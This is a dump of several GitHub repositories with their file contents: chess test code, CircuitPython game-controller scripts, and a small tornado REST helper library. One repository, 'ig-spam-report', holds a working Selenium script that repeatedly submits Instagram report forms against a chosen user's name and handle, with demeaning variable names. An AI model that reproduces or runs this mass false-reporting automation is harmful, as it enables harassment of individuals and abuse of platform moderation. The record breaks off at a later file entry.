# Arrange\n board = Board.empty()\n pawn = Pawn(Player.BLACK)\n pawn_square = Square.at(3, 4)\n board.set_piece(pawn_square, pawn)\n\n friendly = Pawn(Player.BLACK)\n friendly_square = Square.at(2, 5)\n board.set_piece(friendly_square, friendly)\n\n # Act\n moves = pawn.get_available_moves(board)\n\n # Assert\n assert Square.at(2, 3) not in moves\n assert Square.at(2, 5) not in moves\n\nclass TestKnight:\n\n @staticmethod\n def test_white_knight_can_move_diagonally():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.WHITE)\n square = Square.at(0, 1)\n board.set_piece(square, knight)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n assert Square.at(2, 2) in moves\n\n @staticmethod\n def test_black_knight_can_move_diagonally():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.BLACK)\n square = Square.at(7, 1)\n board.set_piece(square, knight)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n assert Square.at(5, 0) in moves\n\n @staticmethod\n def test_knight_leave_the_board():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.WHITE)\n square = Square.at(7, 7)\n board.set_piece(square, knight)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n expected_moves = [Square.at(5, 6), Square.at(6, 5)]\n assert len(moves) == len(expected_moves)\n assert sorted(moves) == sorted(expected_moves)\n\n @staticmethod\n def test_knight_capture_enemy():\n # Arrange\n board = Board.empty()\n knight = Knight(Player.WHITE)\n square = Square.at(3, 5)\n board.set_piece(square, knight)\n\n enemy = Pawn(Player.BLACK)\n enemy_square = Square.at(1, 4)\n board.set_piece(enemy_square, enemy)\n\n # Act\n moves = knight.get_available_moves(board)\n\n # Assert\n assert enemy_square in moves"
}
] | 2 |
Anti9929/ig-spam-report
|
https://github.com/Anti9929/ig-spam-report
|
1264d14d81abf677db59b3aad2a7bc92bd423ecf
|
f19a1a4bbe8bf23c7b2377032be5d59e43dd321f
|
fa5fe2b79705c0e7bc1db5b2c6c7a93bab2ab340
|
refs/heads/main
| 2023-01-05T17:48:46.143281 | 2020-11-07T21:13:44 | 2020-11-07T21:13:44 | 315,678,967 | 1 | 0 | null | 2020-11-24T15:46:33 | 2020-11-07T21:13:46 | 2020-11-07T21:13:45 | null |
[
{
"alpha_fraction": 0.7795275449752808,
"alphanum_fraction": 0.787401556968689,
"avg_line_length": 24.399999618530273,
"blob_id": "2022c9b20ea3eadc7501aa4ee8248b00b50bf528",
"content_id": "904ed3f4210abb64f8efbfa58fd6a1c67f9324b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 5,
"path": "/README.md",
"repo_name": "Anti9929/ig-spam-report",
"src_encoding": "UTF-8",
"text": "# Description\njust a simple python script to spam report a user on instagram using selenium\n\n# How To Run\npython3 IG-Report.py\n"
},
{
"alpha_fraction": 0.569343090057373,
"alphanum_fraction": 0.6175182461738586,
"avg_line_length": 45.79069900512695,
"blob_id": "61797dddccdcf1bea4d0435d40717a967c4c4bc3",
"content_id": "92e06c6db4ae5ade50b7e34c21edec6d072eb517",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2055,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 43,
"path": "/IG-Report.py",
"repo_name": "Anti9929/ig-spam-report",
"src_encoding": "UTF-8",
"text": "import os\r\nimport time\r\nfrom selenium import webdriver as wd\r\nfrom selenium.webdriver.chrome.options import Options\r\n\r\ndef main(gayuser, gayname, delay):\r\n times_reported = 0\r\n while True:\r\n options = Options()\r\n options.headless = False\r\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\r\n driver = wd.Chrome('chromedriver.exe', options=options)\r\n\r\n driver.get('https://help.instagram.com/contact/723586364339719')\r\n driver.find_element_by_xpath('//input[@name=\"Field258021274378282\"]').send_keys(gayuser)\r\n driver.find_element_by_xpath('//input[@name=\"Field735407019826414\"]').send_keys(gayname)\r\n driver.find_element_by_xpath('//span[@class=\"_55pe\"]').click()\r\n driver.find_element_by_xpath('//ul[@class=\"_54nf\"]//a[@title=\"2008\"]').click()\r\n driver.find_element_by_xpath('//a[@class=\"_p _55pi _5vto _55_p _2agf _4o_4 _4jy0 _4jy3 _517h _51sy _42ft\"]//span[@class=\"_55pe\"]').click()\r\n driver.find_element_by_xpath('//a[@title=\"February\"]//span[@class=\"_54nh\"]').click()\r\n driver.find_element_by_xpath('//a[@class=\"_p _55pi _5vto _55_p _2agf _4o_4 _4jy0 _4jy3 _517h _51sy _42ft\"]//span[@class=\"_55pe\"]').click()\r\n driver.find_element_by_xpath('//a[@title=\"9\"]//span[@class=\"_54nh\"]').click()\r\n driver.find_element_by_xpath('//select[@id=\"294540267362199\"]//option[@value=\"Other\"]').click()\r\n driver.find_element_by_xpath('//button[@class=\"_42ft _4jy0 _4jy4 _4jy1 selected _51sy\"]').click()\r\n time.sleep(4)\r\n driver.close()\r\n times_reported += 1\r\n os.system('cls')\r\n print(f'Sent {times_reported} Reports Successfully')\r\n time.sleep(delay)\r\n\r\ndef getthegoodies():\r\n os.system('title IG Spam Report')\r\n os.system('cls')\r\n gayuser = input('Users @: ')\r\n os.system('cls')\r\n gayname = input('Users Full Name: ')\r\n os.system('cls')\r\n delay = int(input('Delay Between Reports: '))\r\n os.system('cls')\r\n main(gayuser, gayname, delay)\r\n\r\ngetthegoodies()\r\n"
}
] | 2 |
ArmaanLala/CircuitPython_games_controllers
|
https://github.com/ArmaanLala/CircuitPython_games_controllers
|
ec4bb9222c0f1be3256cac763ba98c19ded8a3ab
|
188a56d36a11044b0f9c1085e50f53f98fdfb13a
|
42762f9638921796a1240a251351bc9ec57c16a1
|
refs/heads/main
| 2023-07-21T13:26:32.611061 | 2021-09-02T11:03:38 | 2021-09-02T11:03:38 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5398625135421753,
"alphanum_fraction": 0.5807560086250305,
"avg_line_length": 23.453781127929688,
"blob_id": "24d7a2bb6feca927ca6fe65bfbf0dd3dd383c874",
"content_id": "db5496a8e8deaa0f3c4a9082546830cff8b68dc3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2910,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 119,
"path": "/experiment_2_motion/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\nfrom analogio import AnalogIn\nimport adafruit_icm20x\nimport busio\n\n#NOTE: X, Y and Z are used in a weird way. They're different for the IMU, the physical controller and the gamepad. Be Careful!\n\nimport usb_hid\nfrom gamepad import Gamepad\ngp = Gamepad(usb_hid.devices)\n\nx_in_range = 0\ny_in_range = 0\n\n\n#buttons\nbutton_pins = [board.GP20, board.GP12, board.GP13, board.GP18]\nbuttons = []\nfor pin in button_pins:\n button = DigitalInOut(pin)\n button.direction = Direction.INPUT\n button.pull = Pull.UP\n buttons.append(button)\n\nz_in = AnalogIn(board.A2)\n\nx_pins = [board.GP7, board.GP8,board.GP9, board.GP10, board.GP11]\nx_leds = []\nfor pin in x_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n x_leds.append(led)\n \ny_pins = [board.GP5, board.GP6, board.GP14, board.GP15]\ny_leds = []\nfor pin in y_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n y_leds.append(led)\n \nz_pins = [board.GP27, board.GP26, board.GP21, board.GP17, board.GP16]\nz_leds = []\nfor pin in z_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n z_leds.append(led)\n \ni2c = busio.I2C(board.GP1, board.GP0) # uses board.SCL and board.SDA\nicm = adafruit_icm20x.ICM20948(i2c)\n\nwhile True:\n y_accel = icm.acceleration[1]\n x_accel = icm.acceleration[0]\n z_val = z_in.value\n print(z_in.value)\n for led in x_leds:\n led.value = False\n \n if(y_accel) > 4:\n x_leds[0].value = True\n x_in_range = 127\n elif(y_accel) > 2:\n x_leds[1].value = True\n x_in_range = 60\n elif(y_accel) < -4:\n x_leds[4].value = True\n x_in_range = -127\n elif(y_accel) < -2:\n x_leds[3].value = True\n x_in_range = -60\n else:\n x_leds[2].value = True\n x_in_range = 0\n \n for led in y_leds:\n led.value = False\n \n if(x_accel) < - 8:\n y_leds[0].value = True\n elif(x_accel) < -6:\n y_leds[1].value = True\n elif(x_accel) > -1:\n y_leds[3].value = True\n elif(x_accel) > -3:\n y_leds[2].value = True\n\n for led in z_leds:\n led.value = False\n \n if(z_val > 62000):\n z_leds[0].value = True\n y_in_range = 127\n elif(z_val > 45000):\n z_leds[1].value = True\n y_in_Range = 60\n elif(z_val > 28000):\n z_leds[2].value = True\n y_in_range = 0\n elif(z_val > 10500):\n z_leds[3].value = True\n y_in_range = -60\n else:\n z_leds[4].value = True\n y_in_range = -127\n \n gp.move_joysticks(x=-x_in_range, y=-y_in_range)\n \n for i in range(len(buttons)):\n if(not buttons[i].value) :\n gp.press_buttons(i+1)\n else:\n gp.release_buttons(i+1)\n \n time.sleep(0.05)\n"
},
{
"alpha_fraction": 0.61774742603302,
"alphanum_fraction": 0.6505119204521179,
"avg_line_length": 23.847457885742188,
"blob_id": "fcfcfa6703defeb293c2ac8186512cf40e4bfe76",
"content_id": "80b6256136d1dd46bb746627d25dfee9ebc44a2a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1465,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 59,
"path": "/experiment_1_sliders/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom analogio import AnalogIn\nfrom digitalio import DigitalInOut, Direction, Pull\nimport touchio\nfrom board import *\n\nimport usb_hid\nfrom gamepad import Gamepad\n\ngp = Gamepad(usb_hid.devices)\n\nslider_x = AnalogIn(board.A1)\nslider_y = AnalogIn(board.A2)\n\n#want to tweak the values so it's easier to get gentle turns\n'''\ndef get_range(pin):\n return int((pin.value - 32768) / (256*2))*2\n'''\ndef get_range(pin):\n if pin.value < 32768:\n multiplier = -1\n else:\n multiplier = 1\n return int(((pin.value - 32768) / (2895))**2) * multiplier\n\nnum_buttons = 3\ntouch_pins = [GP9, GP8, GP20, GP19]\ntouch_inputs = []\nfor pin in touch_pins:\n touch_inputs.append(touchio.TouchIn(pin))\n\nbutton_pins = [GP16, GP2, GP21]\nbutton_inputs = []\nfor button in button_pins:\n button_in = DigitalInOut(button)\n button_in.direction = Direction.INPUT\n button_in.pull = Pull.UP\n button_inputs.append(button_in)\n\nwhile True:\n print(get_range(slider_x))\n print(touch_inputs[0].raw_value)\n\n gp.move_joysticks(x=get_range(slider_x), y=-get_range(slider_y))\n\n for i in range(len(button_inputs)):\n if(not button_inputs[i].value) :\n gp.press_buttons(i+1)\n else:\n gp.release_buttons(i+1)\n for i in range(len(touch_inputs)):\n if (touch_inputs[i].value):\n gp.press_buttons(i+1+num_buttons)\n else:\n gp.release_buttons(i+1+num_buttons)\n\n time.sleep(0.1)"
},
{
"alpha_fraction": 0.5500261783599854,
"alphanum_fraction": 0.5819801092147827,
"avg_line_length": 20.22222137451172,
"blob_id": "9615f2cb0d331bca149fec6abcadbcffdd750a66",
"content_id": "36a9e74d3c4003e94387e0e628d62975f5906a79",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1909,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 90,
"path": "/experiment_5_universal_flappy_bird/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom analogio import AnalogIn\nfrom digitalio import DigitalInOut, Direction, Pull\nfrom board import *\n\nimport usb_hid\nfrom gamepad import Gamepad\n\ngp = Gamepad(usb_hid.devices)\n\nbutton_x = DigitalInOut(GP17)\nbutton_x.direction = Direction.INPUT\nbutton_x.pull = Pull.UP\n\nbutton_y = DigitalInOut(GP21)\nbutton_y.direction = Direction.INPUT\nbutton_y.pull = Pull.UP\n\nbutton_1 = DigitalInOut(GP9)\nbutton_1.direction = Direction.INPUT\nbutton_1.pull = Pull.UP\n\nbutton_2 = DigitalInOut(GP13)\nbutton_2.direction = Direction.INPUT\nbutton_2.pull = Pull.UP\n\nspeed_x = -127\nspeed_y = -127\n\njump = 60\njump_back = 3\n\ncounter_x = 0\nlimit_x = 1\npressed_x = False\n\ncounter_y = 0\nlimit_y = 1\npressed_y = False\n\nwhile True:\n if (not button_x.value):\n if (not pressed_x):\n speed_x = speed_x + jump\n if speed_x > 127:\n speed_x = 127\n pressed_x = True\n\n if (button_x.value or pressed_x):\n if (button_x.value):\n pressed_x = False\n counter_x = counter_x + 1\n if counter_x > limit_x:\n speed_x = speed_x-jump_back\n if speed_x < -127:\n speed_x = -127\n\n if (not button_y.value):\n if (not pressed_y):\n speed_y = speed_y + jump\n if speed_y > 127:\n speed_y = 127\n pressed_y = True\n\n if (button_y.value or pressed_y):\n if (button_y.value):\n pressed_y = False\n counter_y = counter_y + 1\n if counter_y > limit_y:\n speed_y = speed_y-jump_back\n if speed_y < -127:\n speed_y = -127\n\n gp.move_joysticks(x=speed_x, y=speed_y)\n\n if(not button_1.value):\n gp.press_buttons(1)\n else:\n gp.release_buttons(1)\n\n if(not button_2.value):\n gp.press_buttons(2)\n else:\n gp.release_buttons(2)\n\n print(speed_x, speed_y)\n\n\n time.sleep(0.01)"
},
{
"alpha_fraction": 0.605011522769928,
"alphanum_fraction": 0.6353445649147034,
"avg_line_length": 25.15517234802246,
"blob_id": "c8efc0630d8e84b1ac542da3924b26b1bcbc3e53",
"content_id": "209935e416e096e3116df87e5aecc9e29833a022",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3033,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 116,
"path": "/experiment_4_spinning_chair/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\nfrom analogio import AnalogIn\nimport adafruit_icm20x\nimport busio\nimport math\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\nfrom adafruit_hid.keycode import Keycode\n\nkeyboard = Keyboard(usb_hid.devices)\nkeyboard_layout = KeyboardLayoutUS(keyboard)\n\nx_min = -12\nx_max = 40\n\ny_min = -5\ny_max = 40\n\n#stolen from https://learn.adafruit.com/circuit-playground-express-compass/circuitpython\ndef normalize(value, in_min, in_max):\n mapped = (value - in_min) * 200 / (in_max - in_min) + -100\n return max(min(mapped, 100), -100)\n\ni2c = busio.I2C(board.GP1, board.GP0) # uses board.SCL and board.SDA\nicm = adafruit_icm20x.ICM20948(i2c)\n\n#buttons\nbutton_pins = [board.GP20, board.GP12, board.GP13, board.GP18]\nbuttons = []\nfor pin in button_pins:\n button = DigitalInOut(pin)\n button.direction = Direction.INPUT\n button.pull = Pull.UP\n buttons.append(button)\n\nz_in = AnalogIn(board.A2)\n\nz_pins = [board.GP27, board.GP26, board.GP21, board.GP17, board.GP16]\nz_leds = []\nfor pin in z_pins:\n led = DigitalInOut(pin)\n led.direction = Direction.OUTPUT\n led.value = False\n z_leds.append(led)\n\ndef get_degree():\n value = icm.gyro[2]\n if (value < 0):\n return math.ceil(value)\n if (value >= 0):\n return math.floor(value)\n\ndirection = 0\nlast_direction = 0\nlast_spin = 0\nwhile True:\n z_val = z_in.value\n spin = get_degree()\n\n if spin < 0:\n #turn right\n if last_spin < 0:\n pass\n #continue spinning\n else:\n #start spinning\n keyboard.press(Keycode.RIGHT_ARROW)\n keyboard.release(Keycode.LEFT_ARROW)\n\n if spin > 0:\n #turn left\n if last_spin > 0:\n pass\n #continue spinning\n else:\n #start spinning\n keyboard.press(Keycode.LEFT_ARROW)\n keyboard.release(Keycode.RIGHT_ARROW)\n if spin == 0:\n keyboard.release(Keycode.LEFT_ARROW)\n keyboard.release(Keycode.RIGHT_ARROW)\n\n for led in z_leds:\n led.value = False\n\n if(z_val > 62000):\n z_leds[0].value = True\n keyboard.press(Keycode.UP_ARROW)\n keyboard.release(Keycode.DOWN_ARROW)\n elif(z_val > 45000):\n z_leds[1].value = True\n keyboard.press(Keycode.UP_ARROW)\n keyboard.release(Keycode.DOWN_ARROW)\n elif(z_val > 28000):\n z_leds[2].value = True\n keyboard.release(Keycode.UP_ARROW)\n keyboard.release(Keycode.DOWN_ARROW)\n elif(z_val > 10500):\n z_leds[3].value = True\n keyboard.release(Keycode.UP_ARROW)\n keyboard.press(Keycode.DOWN_ARROW)\n else:\n z_leds[4].value = True\n keyboard.release(Keycode.UP_ARROW)\n keyboard.press(Keycode.DOWN_ARROW)\n\n if buttons[2].value == False:\n keyboard.press(Keycode.ENTER)\n print(\"enter\")\n else:\n keyboard.release(Keycode.ENTER)\n\n time.sleep(0.05)"
},
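Two input paths are combined in the code above: the sign of the gyro z-rate (icm.gyro[2]) maps spin direction to LEFT/RIGHT arrow presses, and the analog slider reading is bucketed into five zones that drive both the LED bar and the UP/DOWN arrows. The zone logic, factored into a small helper for clarity (the helper name is invented; the cut-offs are the ones used in code.py):

def throttle_zone(z_val):
    # Same cut-offs as the elif chain above: zones 0-1 hold UP,
    # zone 2 is the dead zone (both released), zones 3-4 hold DOWN.
    for zone, cutoff in enumerate((62000, 45000, 28000, 10500)):
        if z_val > cutoff:
            return zone
    return 4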
{
"alpha_fraction": 0.7555474638938904,
"alphanum_fraction": 0.7631866335868835,
"avg_line_length": 73.24324035644531,
"blob_id": "efe923acb1dd9c94511bfe5b505051f2ce132fdd",
"content_id": "6a77b33255c65a27234b996bd95d799d0ef4008d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2749,
"license_type": "permissive",
"max_line_length": 454,
"num_lines": 37,
"path": "/README.md",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "# Homebrew games controllers\nI've been playing with home-made games controllers for a while now. Probably too much. \nMostly because I think that the 'joypad' style design is uninspired and there are much better options possible. This is my attempt to find a more fun way of playing games.\n\nI haven't done any schematics because I free-hand the circuits and make them up as I go along. That said, there're very simple and you should be able to infer them from the code.\n\nI got a bunch of protoboard in the shape of gamepads made up. This includes a spot to solder a Pico. Version 1 also had space for two stemma QT connectos , \nbut these proved to be more complex than they're worth so I haven't actually used them. If I make a version 2, I'll drop these.\n\n## Hardware\nIn the hardware folder you'll find easyEDA design files and Gerbers (for fabrication) for version 1 of the controller. There are a bunch of things I'm unhappy with on this, but it works!\n\n## Experiment 1\nSlide potentiometers!\nThe slides used have a 'stick point' in the middle. This makes it easy to use, but takes a bit of a push to get over this lump. It makes it a bit janky to play.\n\nI'm particularly enjoying the micro switches on the sholders though. This is definately a feature I'd like to continue.\n\n[](https://www.youtube.com/watch?v=RL6uFd8PuKk)\n\n(click to open YouTube video)\n\n## Experiment 2\nIMU -- this contains a vastly overkill nine-axis IMU that can be used as an analogue input. In the initial version, it's only used to control the X axis (a bit like a steering wheel). There's also a slider becuase I enjoyed the slider for throttle control. This time, I've gone with a smooth slider (no 'bump' in the middle, but added some LEDs to indicate position (so it's easy to get 0). In hindsight, a colour scale on thes LEDs would have been nice.\n\nOverall, I think I prefer this pot without the sticking point in the middle. IT does need a big dead-zone, and the LEDs help as well.\n\n[](https://www.youtube.com/watch?v=P0G-hcmtkKg) \n\n(click to open YouTube video)\n\n## Experiment 3\nRotary encoder. This is actually the back of the board from Experiment 1. I couldn't find a nice big knob that I liked, so I cut one out of a scrap of plywood on the scroll saw, and hot-glued a small knob in it (this has the right bits for attaching to the rotary encoder shaft). I also screwed another knob on the wheel to act as a handle.\n\n[](https://www.youtube.com/watch?v=HdFMW8ZR8MQ) \n\n(click to open YouTube video)\n\n\n"
},
{
"alpha_fraction": 0.6679447889328003,
"alphanum_fraction": 0.6794478297233582,
"avg_line_length": 24.05769157409668,
"blob_id": "76bfe4149b55c81cbbd23d000e113aaebccc29e9",
"content_id": "1fd13dd1c3500c3e012928713bdf833b15026774",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1304,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 52,
"path": "/experiment_3_spinning/code.py",
"repo_name": "ArmaanLala/CircuitPython_games_controllers",
"src_encoding": "UTF-8",
"text": "import rotaryio\nimport board\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\nfrom adafruit_hid.keycode import Keycode\nfrom digitalio import DigitalInOut, Direction, Pull\nimport time\n\nkeyboard = Keyboard(usb_hid.devices)\nkeyboard_layout = KeyboardLayoutUS(keyboard)\n\nbutton = DigitalInOut(board.GP21)\nbutton.direction = Direction.INPUT\nbutton.pull = Pull.UP\n\nencoder = rotaryio.IncrementalEncoder(board.GP11, board.GP10)\nlast_position = 0\n\nlast_button = False\n\ndef pause():\n for i in range(20000):\n pass\n\nwhile True:\n position = encoder.position\n if last_position is None or position != last_position:\n print(position)\n if (last_position > position):\n keyboard.press(Keycode.Z)\n\n keyboard.release(Keycode.X)\n else:\n keyboard.press(Keycode.X)\n keyboard.release(Keycode.Z)\n\n if (last_position == position):\n keyboard.release(Keycode.Z)\n keyboard.release(Keycode.X)\n\n last_position = position\n\n if (not last_button and not button.value):\n keyboard.press(Keycode.Q)\n pause()\n last_button = True\n\n if (button.value):\n last_button = False\n keyboard.release(Keycode.Q)\n time.sleep(0.01)\n\n"
}
] | 6 |
hobarrera/tornado_rest
|
https://github.com/hobarrera/tornado_rest
|
7bb311d4e866ba49ec90cef0bc02666f546f61d0
|
220616d22c0eeab3dbededf88d471a74b68478f4
|
327d7d72fb166d6018eeb481870cddecf32d68be
|
refs/heads/master
| 2016-08-06T23:31:43.991277 | 2014-08-12T14:24:31 | 2014-08-12T14:24:31 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6202247142791748,
"alphanum_fraction": 0.6232209801673889,
"avg_line_length": 29.340909957885742,
"blob_id": "1672036de9ea6e6b62c22ef1925fd4d70239e76f",
"content_id": "e6459a51769b67933a3574f53b74acbaf4c7d101",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1335,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 44,
"path": "/tornado_rest/decorators.py",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "from functools import wraps\nfrom tornado.web import HTTPError\n\nimport cgitb\nimport json\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n\ndef handle_exceptions(method):\n \"\"\"\n Catches exceptions, logs them, and returns a generic error.\n\n This decorator will actually handle HTTPError exceptions properly and\n return the appropriate error code for this, along with the message json\n wrapped.\n\n This decorator **should** precede all others so as to also handle\n exceptions these might raise.\n \"\"\"\n\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n try:\n return method(self, *args, **kwargs)\n except HTTPError as e:\n logger.debug(e.log_message)\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(json.dumps({'message': e.log_message}, indent=2,\n cls=self.Encoder))\n self.set_status(e.status_code)\n self.finish()\n except Exception as e:\n logger.debug(\"Caught exception\")\n logger.exception(cgitb.text(sys.exc_info()))\n\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(json.dumps({'message': \"Internal server error\"}))\n self.set_status(500)\n self.finish()\n\n return wrapper\n"
},
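A hypothetical usage sketch (the handler class and route are invented; the decorator and RestHandler are the ones defined in this package): an HTTPError raised inside the wrapped method comes back with its own status code and a JSON {"message": ...} body, while any other exception is logged through cgitb and turned into a generic JSON 500.

from tornado.web import HTTPError

from tornado_rest import RestHandler
from tornado_rest.decorators import handle_exceptions


class ItemHandler(RestHandler):

    @handle_exceptions
    def get(self, item_id):
        if item_id != "42":
            # Surfaces as status 404 with body {"message": "no such item"}.
            raise HTTPError(404, "no such item")
        self.respond({"id": item_id})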
{
"alpha_fraction": 0.6528662443161011,
"alphanum_fraction": 0.6592356562614441,
"avg_line_length": 23.153846740722656,
"blob_id": "505bf82d9fbed13e8320d5578c4200560a8fa752",
"content_id": "7c5ccbe640770736fb4f3f035e1e1c40d66e24ff",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 314,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 13,
"path": "/setup.py",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\n\nsetup(\n name='tornado_rest',\n version='1.0',\n author='Hugo Osvaldo Barrera',\n author_email='[email protected]',\n packages=['tornado_rest'],\n url='https://github.com/hobarrera/tornado_rest',\n license='ISC',\n description=\"Utilitary classes used for tornado-based REST proyects.\"\n)\n"
},
{
"alpha_fraction": 0.5992592573165894,
"alphanum_fraction": 0.6074073910713196,
"avg_line_length": 33.61538314819336,
"blob_id": "0249fa6ee4981ec6031e293f8e8ad54a0ec594b1",
"content_id": "6dad70b6c1b912f63650adaec1249a584c21b62d",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1350,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 39,
"path": "/tornado_rest/__init__.py",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "from tornado.web import RequestHandler\n\nimport json\nimport tornado\n\n\nclass RestHandler(RequestHandler):\n\n app_name = None\n app_ver = None\n Encoder = json.JSONEncoder\n\n def set_default_headers(self):\n if not (RestHandler.app_name is None or RestHandler.app_ver is None):\n self.set_header(\"Server\", \"{}/{} tornado/{}\"\n .format(RestHandler.app_name, RestHandler.app_ver,\n tornado.version))\n self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n self.set_header(\"Access-Control-Allow-Headers\",\n \"Content-Type, Cookie, Authorization, X-Filename\")\n self.set_header(\"Access-Control-Allow-Methods\",\n \"GET,PUT,POST,DELETE,OPTIONS\")\n self.set_header(\"Access-Control-Max-Age\", 86400)\n\n def respond(self, data=None, code=200):\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(json.dumps(data, indent=2, cls=RestHandler.Encoder))\n self.set_status(code)\n self.flush()\n self.finish()\n\n def options(self, *args, **kwargs):\n self.respond()\n\n def get_body_arguments(self):\n return json.loads(self.request.body.decode(\"UTF-8\"))\n\n def get_body_argument(self, name):\n return self.get_body_arguments()[name]\n"
},
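Tying the two modules together, a hypothetical minimal app (route, handler name and port are invented): respond() serialises to JSON, applies the CORS headers from set_default_headers and finishes the request, while get_body_argument reads a field from a JSON request body rather than from form data.

import tornado.ioloop
import tornado.web

from tornado_rest import RestHandler


class GreetHandler(RestHandler):

    def post(self):
        # Expects a JSON body such as {"name": "ada"}.
        name = self.get_body_argument("name")
        self.respond({"hello": name}, code=201)


if __name__ == "__main__":
    app = tornado.web.Application([(r"/greet", GreetHandler)])
    app.listen(8888)
    tornado.ioloop.IOLoop.current().start()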
{
"alpha_fraction": 0.7345454692840576,
"alphanum_fraction": 0.7490909099578857,
"avg_line_length": 33.375,
"blob_id": "aa07b1c97c3cb2958ff4aac17c2d77ec30ea1e77",
"content_id": "630d5044dd32d0c998e7d6714500e85e86beaba7",
"detected_licenses": [
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 275,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 8,
"path": "/README.md",
"repo_name": "hobarrera/tornado_rest",
"src_encoding": "UTF-8",
"text": "tornado_rest\n============\n\nThis python module includes a set of utilitary classes I commonly use for tornado-based proyects which expose REST APIs.\n\nThe main goal is to avoid copy-pasting so much, while helping reuse and maintainability.\n\nCopyright (c) 2014 Hugo Osvaldo Barrera <[email protected]>\n"
}
] | 4 |
jigel/noisi
|
https://github.com/jigel/noisi
|
1ce53e2e05a68b1c44c7786d6dd09048dbe93874
|
bb940c99069cf66a6ff7b267265a76af9e252c9c
|
5e28411b9d48f990c9e348f94dca50ac91abcf13
|
refs/heads/master
| 2021-05-09T23:59:57.223626 | 2018-09-27T13:22:49 | 2018-09-27T13:22:49 | 118,816,779 | 1 | 0 | null | 2018-01-24T20:15:00 | 2018-09-17T14:46:06 | 2018-09-26T18:51:40 |
Jupyter Notebook
|
[
{
"alpha_fraction": 0.5432717800140381,
"alphanum_fraction": 0.563324511051178,
"avg_line_length": 28.803150177001953,
"blob_id": "fd338d0e0060993efba9734df578015cf94e2220",
"content_id": "81f2bd0be50662e717c67307d77ac30981bd8465",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3790,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 127,
"path": "/noisi/scripts/source_grid.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
